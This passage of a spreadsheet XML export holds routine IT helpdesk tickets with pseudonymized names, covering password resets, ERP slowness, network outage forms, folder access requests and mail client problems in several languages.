1)      on my kpm,   (i) my time keep does not go forward, (ii) i submitted my time report for last week but my supervisor does not receive it, and (iii) my time keeping window, only showing one row.
2)      on my e-time, i cannot enter a new vacation time
x.  dathniel  fangtry
senior staff engineer
</t>
  </si>
  <si>
    <t>zywoxerf paqxtrfk</t>
  </si>
  <si>
    <t xml:space="preserve">unable to see engineering_tool </t>
  </si>
  <si>
    <t xml:space="preserve">need file pulled from the backup - h:\manufacturing\backorder database openorderbook_v7g_rev.accdb </t>
  </si>
  <si>
    <t xml:space="preserve">current file is corrupt and not working_x000D_
server name-dat1-HostName_1326 </t>
  </si>
  <si>
    <t>eirkpyfv zdipasul</t>
  </si>
  <si>
    <t>wifi companysecure not working at sao bernardo do campo</t>
  </si>
  <si>
    <t>iwifi companysecure not working at sao bernardo do campo</t>
  </si>
  <si>
    <t>call came and got disconnected._x000D_
private number was unable to call.</t>
  </si>
  <si>
    <t>nfhaople pywbcozt</t>
  </si>
  <si>
    <t>not able to post delivery 8058337294</t>
  </si>
  <si>
    <t xml:space="preserve">get the attached error when trying to post delivery 9169448305. </t>
  </si>
  <si>
    <t>skype addin disabled</t>
  </si>
  <si>
    <t>name:pfzxecbo ptygkvzl
language:
browser:microsoft internet explorer
email:pfzxecbo.ptygkvzl@gmail.com
customer number:
telephone:
summary:i can not add a skype meeting link to a new meeting notice.  the button is no longer there.  please advise how to get it back.</t>
  </si>
  <si>
    <t>pfzxecbo ptygkvzl</t>
  </si>
  <si>
    <t>uninstalling driver update // slimware technologies // external software</t>
  </si>
  <si>
    <t>venue 11 pro 7130 vpro 2 - detachable keybankrd is having severe issues..</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
please send me a replacement detachable keybankrd for my "venue 11 pro 7130 vpro"._x000D_
_x000D_
the right hand keys are not working/not working properly._x000D_
_x000D_
it makes using the machine very problematic._x000D_
</t>
  </si>
  <si>
    <t>lost access to mii scanning</t>
  </si>
  <si>
    <t>name : tim hopes
email : dkxlpvnr.narxcgjh@gmail.com
telephone : 
summary : two employee's lost access to mii scanning.  clock numbers 20905675 and 65941543.</t>
  </si>
  <si>
    <t>dkxlpvnr narxcgjh</t>
  </si>
  <si>
    <t>odbc-fehler - systemfehler 126: das angegebene modul wurde nicht gefunden. treiber nicht geladen</t>
  </si>
  <si>
    <t xml:space="preserve">ich mÃ¶chte einen serienbrief erstellen, kann aber meine datenquelle (excelliste) nicht Ã¶ffnen?_x000D_
ïƒ¨ systemfehler 126 ??? ich bitte um hilfe! danke._x000D_
</t>
  </si>
  <si>
    <t>unable to connect to internet</t>
  </si>
  <si>
    <t xml:space="preserve">system freezing </t>
  </si>
  <si>
    <t>erp login issue, password reset</t>
  </si>
  <si>
    <t>circuit outage: company-na-usa-usa-eh-2811-mpls-rtr01 located at usa company is down since 8.36am et on 10/18.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___8.36am et on 10/18___________________x000D_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_____global_telecom_1(# 000000223172498)____________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>gfjqrsxz bcyhezsl</t>
  </si>
  <si>
    <t>reset the password for rzxfgmcu xprwayoc on other / impact award</t>
  </si>
  <si>
    <t xml:space="preserve">please unlock my password. i forgot it._x000D_
</t>
  </si>
  <si>
    <t>rzxfgmcu xprwayoc</t>
  </si>
  <si>
    <t xml:space="preserve">outlook issue : not loading </t>
  </si>
  <si>
    <t>vitpjxgm zxiqkrns</t>
  </si>
  <si>
    <t>password reset from password_management_tool</t>
  </si>
  <si>
    <t>please redirect to local it: word document 134257.doc broken</t>
  </si>
  <si>
    <t>das folgende word-dokument kann nicht mehr bearbeitet werden: \\edksm003\qs\zeugnis_kunden\134\134257\134257.doc (der cursor springt stÃ¤ndig auf seite 11).</t>
  </si>
  <si>
    <t>GRP_49</t>
  </si>
  <si>
    <t>cwtrgeup nxctkmzo</t>
  </si>
  <si>
    <t>reset passwords for wvdxnkhf jirecvta using password_management_tool password reset.</t>
  </si>
  <si>
    <t>scheduled job needs canceled</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bwfhtumx.japznrvb@gmail.com
there is a job that had been printing out every morning on bd18.  i need it cancelled.  this is the one that printed today.  if you look at tomorrow's date, you can see there is one released that will proint.
[cid:image001.jpg@01d22914.f4adc7c0]
bwfhtumx japznrvb
 regional controller
bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;
</t>
  </si>
  <si>
    <t>fc for eweausbildung for jannek hÃ¼ndling</t>
  </si>
  <si>
    <t xml:space="preserve">hallo,
bitte fÃ¼r jannek hÃ¼ndling zugriff auf den ordner department / ausbildung.
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>fdyietau dvsyxwbu</t>
  </si>
  <si>
    <t>engineering tool will not work</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wlsazrce.uwehsqbk@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i cannot open, close, or manipulate any of my tasks on engineering tool.  this makes it difficult to work with our team in india.  please have a look._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wlsazrce uwehsqbk</t>
  </si>
  <si>
    <t>erp und EU_tool geht sehr langsam</t>
  </si>
  <si>
    <t>EU_tool funktioniert teilweise gar nicht</t>
  </si>
  <si>
    <t>efjzbtcm mdpviqbf</t>
  </si>
  <si>
    <t>erp complete system very slow</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 system in germany is extremly slow  no delivery possilbe please help </t>
  </si>
  <si>
    <t>erp logon</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xaertwdh.kcsagvpy@gmail.com_x000D_
_x000D_
hi_x000D_
please assist, changed password this morning. entered old password just now. please activate?_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>epAYsqnX RAkuDnXG</t>
  </si>
  <si>
    <t>windows account unlock</t>
  </si>
  <si>
    <t>emtwgzxh sgkrzinp</t>
  </si>
  <si>
    <t>erp reagiert extrem langsam</t>
  </si>
  <si>
    <t>transaktionen in erp dauern zu lange</t>
  </si>
  <si>
    <t>monitor fÃ¼r video messmaschine liefern \oziflwma nhgvmqdl</t>
  </si>
  <si>
    <t>probleme mit outlook \cwivnxuk izmxqfud</t>
  </si>
  <si>
    <t>cwivnxuk izmxqfud</t>
  </si>
  <si>
    <t>rechner optiplex790 defekt \ ewew8323670 \xpugntjv zcaermdt</t>
  </si>
  <si>
    <t>xpugntjv zcaermdt</t>
  </si>
  <si>
    <t>engineering tool is not working...</t>
  </si>
  <si>
    <t>error: you are not authorized to view this page_x000D_
you do not have permission to view this directory or page using the credentials that you supplied. "</t>
  </si>
  <si>
    <t>aunkpchr qsyvrmjl</t>
  </si>
  <si>
    <t>outlook does not start anymore</t>
  </si>
  <si>
    <t>after clicking the outlook icon, the start window appears for minutes. _x000D_
no matheywter how long you wait, the programdnty does not start. _x000D_
also a restart of the computer brought no improvement</t>
  </si>
  <si>
    <t>ebldwvth qzsfkyuw</t>
  </si>
  <si>
    <t>res: inc1559160-problem with engineering_tool for non miowvyrs qkspyrdms</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qasdhyzm.yuglsrwx@gmail.com
fyi
qasdhyzm yuglsrwx
analyst, distributed system lan/pc
qasdhyzm.yuglsrwx@gmail.com&lt;mailto:qasdhyzm.yuglsrwx@gmail.com&gt;
de: qasdhyzm yuglsrwx
enviada em: terÃ§a-feira, 18 de outubro de 2016 08:20
para:  &lt;ongumpdz.pjkrfmbc@gmail.com&gt;
cc: 'ferguss - gustaco filipim requena hp' &lt;gustathsvo@gmail.com.br&gt;
assunto: res: inc1559160-problem with engineering_tool for non miowvyrs qkspyrdms
hi ,
we are waiting you, i'm available and gustavo too, i believe that you need connect in computer the gustathsvo (non-company) to solve this problem, can you connect in computer the gustathsvo now? or can be 4:00pm (ist).
if you can streamline this process i appreciate, because gustathsvo has this problem by 2 weeks.
qasdhyzm yuglsrwx
analyst, distributed system c
qasdhyzm.yuglsrwx@gmail.com&lt;mailto:qasdhyzm.yuglsrwx@gmail.com&gt;
de: 
enviada em: terÃ§a-feira, 18 de outubro de 2016 03:06
para: qasdhyzm yuglsrwx &lt;qasdhyzm.yuglsrwx@gmail.com&lt;mailto:qasdhyzm.yuglsrwx@gmail.com&gt;&gt;
assunto: inc1559160-problem with engineering_tool for non miowvyrs qkspyrdms
hi ,
can you please come up with your availability aerp. it would be great if you could mention the date and time (ist) . :)
please give me a call if you could not reach out to me via skype.
</t>
  </si>
  <si>
    <t>network outage: company-russia-ups-vpn-rtr.company.com located at russia warehouse is down since 5:09 am et on 10/18.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ______no___     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____5:09 am et on 10/18__________________x000D_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_____na___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</si>
  <si>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EU_tool is down in plant germany</t>
  </si>
  <si>
    <t>please restart the EU_tool server aerp, so we can run production as planned</t>
  </si>
  <si>
    <t>create business partner id - vvtathadnda1</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rtpcnyhq.ceqmwkhi@gmail.com
hello team,
can you please create a business partner id for vvtathadnda1 in solution manager.
rtpcnyhq ceqmwkhi
rtpcnyhq.ceqmwkhi@gmail.com&lt;mailto:rtpcnyhq.ceqmwkhi@gmail.com&gt;
</t>
  </si>
  <si>
    <t>rtpcnyhq ceqmwkhi</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/18/2016 04:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/18/2016 04:54:00</t>
  </si>
  <si>
    <t xml:space="preserve">unable to loin to ess portable </t>
  </si>
  <si>
    <t>makypvlb vslirqhy</t>
  </si>
  <si>
    <t>multiple app problems, user jesjnlyenmrest34</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vogtfyne.isugmpcn@gmail.com
hello,
user gkzedilm.tkpfumeb@gmail.com&lt;mailto:gkzedilm.tkpfumeb@gmail.com&gt; [jesjnlyenmrest34]  is experiencing programdnty issues with these aplications:
engineering_tool â€“ he can access it, create new report, unable to submit
the computers are approximately one year old, should i rather reinstall this pc instead of trying to fix the problems separatelly?
best </t>
  </si>
  <si>
    <t>gkzedilm tkpfumeb</t>
  </si>
  <si>
    <t>setup EU_tool \we_wu185 \8323738 \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>fc for HostName_717\sk-leitung for user mokolthrl12a</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,
bitte lese- u. schreibberechtigung fÃ¼r niptbwdq csenjruz einrichten. ist mit sbtvploj mwtrouyl besprochen.
gruÃŸ
lhmxposv lnpgjhus
betriebsabteilungsleiter technische dienste
lhmxposv.lnpgjhus@gmail.com
geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq
sitz/registered office: germany - registergerirtcht/listed in the court register: germany
persÃ¶nlich haftende gesellschafterin/general partner: company company beteiligungs gmbh
sitz/registered office: fÃ¼rth/bay. - registergerirtcht/listed in the court regster: fÃ¼rth
von: niptbwdq csenjruz 
gesendet: montag, 17. oktober 2016 12:07
an: jionmpsf wnkpzcmv; xmlbfjpg yegzbvru; dhoalycb yopvwrjq; lhmxposv lnpgjhus; sbtvploj mwtrouyl; joerg passiep; cwryvksu cedsairg
betreff: aw: maschinenumstellung
bei mir klappt es nicht.
mit freundlichen grÃ¼ÃŸen
niptbwdq csenjruz
servicecenter instandhaltung
niptbwdq.csenjruz@gmail.com
</t>
  </si>
  <si>
    <t>lhmxposv lnpgjhus</t>
  </si>
  <si>
    <t>insert to d/n no.</t>
  </si>
  <si>
    <t>please insert the delivery note no. in erp book.</t>
  </si>
  <si>
    <t>purchase order print</t>
  </si>
  <si>
    <t xml:space="preserve">dear all
this is jathyrsy from plant_69.
we are on the audit and the auditor would like to see po documents(hard copy).
is there any way to print po documents one time ?
if i ues me23n and zz_mails, i need to do one by one. the number of pos is more than 200.
</t>
  </si>
  <si>
    <t>network outage: company-na-usa-usa-township-dmvpn-1921-rtr01 since 2:59 am et on  10/18.</t>
  </si>
  <si>
    <t>what type of outage:  _  x____network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __2:59 am et on  10/18.____________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? _no______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____no____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _ na__________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</si>
  <si>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outlook 2010 - 64 bit - prompts for password repeatedly after a password reset</t>
  </si>
  <si>
    <t>we are downloading the sp2 for outlook and will see if the issue is resolved once it is installed.</t>
  </si>
  <si>
    <t>thrmnwjf sxzkeymq</t>
  </si>
  <si>
    <t>bitte das iphone-6 001 freischalten fÃ¼r mail-empfang.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rtnyumbg.yzemkhbq@gmail.com
hallo zusammen,
bitte das iphone-6 001 freischalten fÃ¼r mail-empfang.
danke
mit freundlichen grÃ¼ÃŸen
rtnyumbg yzemkhbq / tel
[cid:image001.jpg@01d22919.634da5c0]
mit freundlichen grÃ¼ÃŸen
rtnyumbg yzemkhbq
techn. beratung und verkauf
rtnyumbg.yzemkhbq@gmail.com&lt;mailto:rtnyumbg.yzemkhbq@gmail.com&gt;
company deutschland gmbh
max-planck-straÃŸe 13&lt;x-apple-data-detectors://1&gt;
&lt;x-apple-data-detectors://1&gt;
company deutschland gmbh
geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, harald mÃ¤nnlein, herr pinkow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select the following link to view the disclaimer in an alternate language.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</si>
  <si>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rtnyumbg yzemkhbq</t>
  </si>
  <si>
    <t>can you please unlock and reset password for userid bertes34 and let me know the initial password</t>
  </si>
  <si>
    <t>user needs help to open .rar file.</t>
  </si>
  <si>
    <t>user needs help to open .rar file._x000D_
-connected to the user system using teamviewer._x000D_
-installed the application on the user system._x000D_
-user informed he is able to open the .rar files now._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>ufvprezt soqlikch</t>
  </si>
  <si>
    <t>ç”µè¯æœºæ²¡æœ‰å£°éŸ³</t>
  </si>
  <si>
    <t>cyjlqdwm kywiuosn</t>
  </si>
  <si>
    <t>media server disconnect lpapr952(south_amerirtca  south_amerirtca)</t>
  </si>
  <si>
    <t xml:space="preserve">received below email from inin tried to ping the server but it is not responding.
from: cthaasnoc@gmail.com 
sent: monday, october 17, 2016 11:34 pm
to: 
subject: media server disconnect
october 17, 2016
company inc.,
the cthaasnoc network operations center (noc) has received a media server disconnect alert via proactive monitoring for the following media server(s). we have opened an incident to track this alert and will close the incident when connectivity is re-established to the media server. please verify power to all devices and/or follow up with your network provider for further troubleshooting.
affected infrastructure
server: den157gic064 - 78.39.157.64, location: , united states
ind157gic064 - 78.38.157.64, location: , united states
ind157gic064 - 78.38.157.64, location: , united states
den157gic064 - 78.39.157.64, location: , united states
den157gic064 - 78.39.157.64, location: , united states
den157gic064 - 78.39.157.64, location: , united states
den157gic064 - 78.39.157.64, location: , united states
den157gic064 - 78.39.157.64, location: , united states
additional information
trghwyng route to lpapr952 [10.34.160.12]
over a maximum of 30 hops:
sartlgeo lhqksbdx ms &lt;1 ms &lt;1 ms 21.97.98.46829
2 &lt;1 ms &lt;1 ms &lt;1 ms 21.97.98.468
3 4 ms 9 ms 3 ms 10.20.2.70
4 158 ms 157 ms 157 ms 10.42.1.82
5 168 ms 168 ms 168 ms 10.42.1.81
6 169 ms 168 ms * 79.67.01.659
7 * * * request timed out.
8 * * * request timed out.
9 * * * request timed out.
10 * * * request timed out.
if you have any questions regarding this notification please contact our support team at the number listed below.
sincerely,
interactive intelligence cthaasnoc team
interactive intelligence blast notification 
this mailbox is not monitored.please call support at the phone number in this communication for any questions you may have.
</t>
  </si>
  <si>
    <t>not able to access business_client</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ntuhoafg.bzwefjvk@gmail.com_x000D_
_x000D_
hello,_x000D_
i am not able to access business_client, please help._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ntuhoafg bzwefjvk</t>
  </si>
  <si>
    <t>system bankrd temperature alerts in monitoring_tool for south_amerirtca  south_amerirtca servers HostName_1238 &amp; HostName_1237</t>
  </si>
  <si>
    <t>system bankrd inlet temp  alert for HostName_1237_x000D_
system bankrd ambient temp alert for lpas060._x000D_
_x000D_
attached is the screen shot of windows event viewer logs</t>
  </si>
  <si>
    <t>erp SID_34 password  sign on is cabane please reset to daypay3  thank you</t>
  </si>
  <si>
    <t xml:space="preserve">name:fyzceglp vfnraqxc
language:
browser:microsoft internet explorer
email:fyzceglp.vfnraqxc@gmail.com
customer number:
telephone:
summary:i have another user that can't remember his erp SID_34 password  sign on is cabane please reset to daypay3  </t>
  </si>
  <si>
    <t>fyzceglp vfnraqxc</t>
  </si>
  <si>
    <t>:user pluytd54 ( erthryika plaunyud ) locked herself out of erp SID_34 - can you please reset her password to daypay3?  thank you</t>
  </si>
  <si>
    <t xml:space="preserve">name:fyzceglp vfnraqxc
language:
browser:microsoft internet explorer
email:fyzceglp.vfnraqxc@gmail.com
customer number:
telephone:
summary:user pluytd54 ( erthryika plaunyud ) locked herself out of erp SID_34 - can you please reset her password to daypay3?  </t>
  </si>
  <si>
    <t>reset passwords for pxvjczdt kizsjfpq using password_management_tool password reset.</t>
  </si>
  <si>
    <t>pxvjczdt kizsjfpq</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access emails on outlook </t>
  </si>
  <si>
    <t xml:space="preserve">erp did not pull the customer part number from the ztax item for the taps item </t>
  </si>
  <si>
    <t xml:space="preserve">hello it-team,_x000D_
_x000D_
please help to check the following issue â€“ erp did not pull the customer part number from the ztax item for the taps item â€“ although it was shown on the delivery note (please see attached) we were not able to print the label for item 22:_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bswlorek yhdrlgbs</t>
  </si>
  <si>
    <t xml:space="preserve">not able to login to collaboration_platform </t>
  </si>
  <si>
    <t>not able to login to collaboration_platform</t>
  </si>
  <si>
    <t>wsxhlagq rqejbwfu</t>
  </si>
  <si>
    <t>ticket update on ticket_no0448767</t>
  </si>
  <si>
    <t>action could not be performed</t>
  </si>
  <si>
    <t xml:space="preserve">henvrkuo nogrfadw is getting the following error message when trying to access purchasing:_x000D_
"no data found for employee '1111102236'; inform system administration."_x000D_
_x000D_
please sync her hr org details to purchasing. </t>
  </si>
  <si>
    <t>i would like to be able to use the camera on my skype for business calls.  can you add this to my options?</t>
  </si>
  <si>
    <t xml:space="preserve">if this option is currently available, please let me know.  </t>
  </si>
  <si>
    <t>yswgzvrc frjzcnsu</t>
  </si>
  <si>
    <t>no audio on ethics page</t>
  </si>
  <si>
    <t>vyluaepi dtwfaejr</t>
  </si>
  <si>
    <t xml:space="preserve">intermittent audio issue on computer </t>
  </si>
  <si>
    <t xml:space="preserve">outlook query </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:when logging in remotely, i am unable to access my outlook. i understand there is a setting i need to change to fix the issue. please help! </t>
  </si>
  <si>
    <t>inc1559962 - ticket update</t>
  </si>
  <si>
    <t>hpqc uacyltoe hxgaycze client login error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nuhfwplj.ojcwxser@gmail.com_x000D_
_x000D_
when i try to login, the following message is received.  please advise._x000D_
_x000D_
[cid:image001.png@01d2287e.88fe6750]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">ticket query on ticket_no1559208 </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nuhfwplj.ojcwxser@gmail.com_x000D_
_x000D_
i am unable to log into skype.  please advise._x000D_
_x000D_
[cid:image001.png@01d2287a.e58a4150]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>monitor on x-ray instrument pc will not stay turned on.</t>
  </si>
  <si>
    <t>budighfl izbxvary</t>
  </si>
  <si>
    <t>sever hqap101 has a hd failure light</t>
  </si>
  <si>
    <t>sever hqap101 has a hd failure light, kindly create a ticket with the vendor.</t>
  </si>
  <si>
    <t>interaction id : 1064857564</t>
  </si>
  <si>
    <t xml:space="preserve">static sound from telephony_software phones : id : 2175968675 </t>
  </si>
  <si>
    <t>plant_269 xerox workcentre 5335 - rr18 printer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dpuifqeo.eglwsfkn@gmail.com_x000D_
_x000D_
please advise the user login associated with this machine â€“ need to update the address book_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need installation of msoffice 2010</t>
  </si>
  <si>
    <t>need installation of msoffice 2010._x000D_
_x000D_
user is a new joiner and she's unable to access msoffice 2013 as because she's having e1 license.</t>
  </si>
  <si>
    <t>\\HostName_768\teams\rta full control access for rjodlbcf uorcpftk</t>
  </si>
  <si>
    <t>ntsowaem jfgslyde</t>
  </si>
  <si>
    <t>password reset rqeuest for SID_34 erp for fduinmtw yofhirjs (hixsodl)</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i need to have a user id reset for SID_34 erp for fduinmtw yofhirjs (hixsodl)
please e-mail her once you have reset the password.</t>
  </si>
  <si>
    <t>idlupnzr nkxylwrc</t>
  </si>
  <si>
    <t>unlock password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bihfazru.bhjqvtzm@gmail.com
hello, i have 2 employees that has access to scan out production orders on saturday oct. 15, 2016 but do not have access today. could you check into this problem and let me know what to do? hydluapo qbgclmit 6593679 and eulsvchi rqflkeuc 6676678. they have tried to unlock everything in password_management_tool but no luck.
cthryhris kovaddcth
production supervisor
bihfazru.bhjqvtzm@gmail.com&lt;mailto:bihfazru.bhjqvtzm@gmail.com&gt;
[cid:image003.jpg@01cfcb3e.29ec32f0]
</t>
  </si>
  <si>
    <t>frequent lock out issue.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ksxjcvze.ognyetrp@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
i can't go into vpn,_x000D_
password should be not right.???!!!_x000D_
_x000D_
please can you reset my password.  also for vpn_x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>ksxjcvze ognyetrp</t>
  </si>
  <si>
    <t>the engineering tool is not installed properly</t>
  </si>
  <si>
    <t xml:space="preserve">there are two different engineering tools installed on the 2-in1 tablet and neither of them work properly. when i click on a link it goes into a web based search, also when i click on the engineering tool icon it show an error "cannnot continue the application is improperly formatheywted).  the other error that i get below is an example of the web based search when entering a new engineering_tool:_x000D_
sorry, the page you were looking for does not exist or is not available. we performed a web search for "http engineering data report server pages report viewer aspx report viewer pages report server" and here's what we found. </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2668 failed in job_scheduler at: 10/17/2016 12:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2668 failed in job_scheduler at: 10/17/2016 12:06:00</t>
  </si>
  <si>
    <t>help with programdnty nx9</t>
  </si>
  <si>
    <t xml:space="preserve">hi , 
we need your help with programdnty nx9. when the users tiaghry santhuy and pvimkcfw sarxkfvj click in gkad the nx close.
can we do make something to solve this problem?
</t>
  </si>
  <si>
    <t>pvimkcfw sarxkfvj</t>
  </si>
  <si>
    <t>crm add in will not come up</t>
  </si>
  <si>
    <t>aqyjewmf ceksapdw</t>
  </si>
  <si>
    <t>analysis not working to run my quote reports. it is not showing in my tool bar.</t>
  </si>
  <si>
    <t>when i try to open through erp business analysis it gives error. the launcher is exited with error. analysis add in is not registered correctly.</t>
  </si>
  <si>
    <t>gdpxqyhj iapghvke</t>
  </si>
  <si>
    <t>password reset request for erp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: irqpwgtn.dpautgeh@gmail.com
dear sir,
please reset password as it is failed to logon. as i had changed the password_management_tool password due to expiry which results in this problem.
user name: schyhty
emp id: 2027646758
[cid:image001.jpg@01d228b9.e1e4e160]
with best </t>
  </si>
  <si>
    <t>irqpwgtn dpautgeh</t>
  </si>
  <si>
    <t>flash player update issue</t>
  </si>
  <si>
    <t>folder access rqeuest : ldgm003 i:\lean</t>
  </si>
  <si>
    <t xml:space="preserve">contact :
need read/write access to folder ldgm003 i:\lean
network path : \\HostName_835\public\lean : read and write access </t>
  </si>
  <si>
    <t>gjbcengineering_tooll gidsekfo</t>
  </si>
  <si>
    <t>erp prtgghj4k password reset</t>
  </si>
  <si>
    <t>zfebmujk mtdzqjue</t>
  </si>
  <si>
    <t>tqvpohwj tbkywpqz</t>
  </si>
  <si>
    <t>zidcxslw clyfdaki</t>
  </si>
  <si>
    <t>forward bcxfhekz bplfrnis's emails to zneyrlhg bfiwanze</t>
  </si>
  <si>
    <t xml:space="preserve">bcxfhekz bplfrnis (2118145) exited the company and we need to forward bcxfhekz bplfrnis's emails to zneyrlhg bfiwanze effective immediately._x000D_
</t>
  </si>
  <si>
    <t>zneyrlhg bfiwanze</t>
  </si>
  <si>
    <t>cothyshy has access to the above link. she can edit. but whenever she saves it she does not receive the email confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">telephone:
summary:i have completed a nda for alarm systems but am not receiving the emailed response with link to the form.  
cothyshy has access to the above link. she can edit. but whenever she saves it she does not receive the email confirmation/ copy.
</t>
  </si>
  <si>
    <t>avglmrts vhqmtiua</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2668 failed in job_scheduler at: 10/17/2016 10:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2668 failed in job_scheduler at: 10/17/2016 10:06:00</t>
  </si>
  <si>
    <t>icloud account is synched with outlook. need to delete it.</t>
  </si>
  <si>
    <t>aguxobqs upgtdafh</t>
  </si>
  <si>
    <t>erp SID_34 account locked out.</t>
  </si>
  <si>
    <t>jmsaopew dnuvpfci</t>
  </si>
  <si>
    <t>erp SID_34 password change</t>
  </si>
  <si>
    <t>name:bettymcdanghtnuell
language:
browser:microsoft internet explorer
email:mcdythanbm@company.com
customer number:
telephone:
summary:iam locked out of erp tried to change password and got locked out</t>
  </si>
  <si>
    <t>vwaejqrh kmtvyesb</t>
  </si>
  <si>
    <t>new employee phone number needed</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:new employee phone number needed
</t>
  </si>
  <si>
    <t>oqbstujm sutjvker</t>
  </si>
  <si>
    <t>cannot connect pvn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aqrhwjgo.cyelqkvs@gmail.com_x000D_
_x000D_
dear it team,_x000D_
_x000D_
i cannot connect below link. it is long download it and as below screen. please help._x000D_
_x000D_
users can access vpn (_x000D_
_x000D_
[cid:image001.png@01d228b7.02ba5da0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>GRP_50</t>
  </si>
  <si>
    <t>aqrhwjgo cyelqkvs</t>
  </si>
  <si>
    <t>server HostName_858 automatically cancelled backup</t>
  </si>
  <si>
    <t>received the following email for the last two backups: the job was automatically canceled because it exceeded the job's maximum configured run time. backup server is HostName_858._x000D_
_x000D_
stefyty dabhruji is currently assisting.</t>
  </si>
  <si>
    <t>detboaws rvuelfci</t>
  </si>
  <si>
    <t>i cannot access the planner app in owa</t>
  </si>
  <si>
    <t>name:giuliasana byhdderni
language:
browser:microsoft internet explorer
email:ajnpuqym.gvoncems@gmail.com
customer number:
telephone:
summary:i cannot access the planner app in owa</t>
  </si>
  <si>
    <t>ajnpuqym gvoncems</t>
  </si>
  <si>
    <t>password expired // unable to change the password</t>
  </si>
  <si>
    <t>phvgbire ekbhqcap</t>
  </si>
  <si>
    <t xml:space="preserve">password reset  through password_management_tool password manager/collaboration_platform issue </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i am having difficulty changing my password for usa company through the password_management_tool id system. please assist. </t>
  </si>
  <si>
    <t>ferxqvsm esmwxqlf</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mfizgpoy.akbvznci@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i would like to gain access to this link: _x000D_
_x000D_
i am trying to complete an lagp request for one of my customers. this is the error i'm receiving._x000D_
[cid:image001.png@01d22855.aac9f8a0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mfizgpoy akbvznci</t>
  </si>
  <si>
    <t>ticket update - inplant_870028</t>
  </si>
  <si>
    <t>branding site</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jefguyza.mkhwcnes@gmail.com
hello, i can not open our branding site, i receive following error message in internet explorer:
make sure the web address 
(i am on vpn)
 syhtu pozdrsavom / mit freundlichem gruss / best </t>
  </si>
  <si>
    <t>jefguyza mkhwcnes</t>
  </si>
  <si>
    <t>getting an error when trying to access the precall planning reports and cmor see attached</t>
  </si>
  <si>
    <t>keinyujo torvxeda can not access the pre call planning section of the account record.  he gets an error that is the same as the one he gets for his reporting_engineering_tool on the crm dashbankrd.  it fixed once, but when i opened crm again, same issue happened</t>
  </si>
  <si>
    <t>keinyujo torvxeda</t>
  </si>
  <si>
